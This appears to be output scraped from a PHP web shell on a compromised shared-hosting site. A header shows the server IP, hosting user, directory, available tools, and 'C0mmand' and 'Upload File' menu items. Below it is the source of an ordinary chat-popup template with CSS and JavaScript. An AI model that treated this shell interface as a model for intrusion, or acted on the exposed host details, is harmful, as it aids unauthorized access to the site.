Server IP : 103.53.40.154 / Your IP : 3.147.76.183 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/fortuunedestiny.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<div class="wp-styd1"> <!-- <p id="myBtn2"><img src="images/talk-to.png" style="width:52px; position:relative; top:10px;" style="float-right"></p> --> <p id="myBtn2" class="stychtres" style="border:1px solid #1A9B74; padding:1px; border-radius:50%; background-color:#1A9B74; cursor:pointer; "> <img src="<?=$site_url?>/images/2020-02-26.png"> <!-- <i class="fa fa-comment-o" style="color:white;font-size:33px;"></i>--> </p> </div> <!------==========-----> <style> .modaldolly { display: none; /* Hidden by default */ position: fixed; /* Stay in place */ z-index:999; /* Sit on top */ padding-top:20px; /* Location of the box */ left: 0; top: 0; overflow:hidden; width: 100%; /* Full width */ height: 100%; /* Full height */ overflow: auto; /* Enable scroll if needed */ background-color: rgb(0,0,0); /* Fallback color */ background-color: rgba(0,0,0,0.4); /* Black w/ opacity */ } /* modaldolly Content */ .modaldolly-content2 { background-color: #fefefe; margin: auto; padding: 20px; border: 1px solid #888; width:30%; top:10px; } /* The closechat2 Button */ .closechat2 { color: #aaaaaa; float: right; font-size: 28px; font-weight: bold; } .closechat2:hover, .closechat2:focus { color: #000; text-decoration: none; cursor: pointer; } </style> <!-- The modaldolly --> <div id="mymodaldollychat1" class="modaldolly" style="overflow:hidden; z-index:9999;"> <div class="modaldolly-content2" > <span class="closechat2">×</span> <p><iframe src="<?=$compDATA['admin_live_chat_code']?>" height="500" width="100%" frameborder="0" marginheight="0" marginwidth="0">Loading…</iframe></p> </div> </div> <script> // Get the modaldolly var modaldolly = document.getElementById("mymodaldollychat1"); // Get the button that opens the modaldolly var btn = document.getElementById("myBtn2"); // Get the <span> element that closechat2s the modaldolly var span = document.getElementsByClassName("closechat2")[0]; // When the user clicks the button, open the modaldolly btn.onclick = function() { modaldolly.style.display = "block"; } // When the user clicks on <span> (x), closechat2 the modaldolly span.onclick = function() { modaldolly.style.display = "none"; } // When the user clicks anywhere outside of the modaldolly, closechat2 it window.onclick = function(event) { if (event.target == modaldolly) { modaldolly.style.display = "none"; } } </script>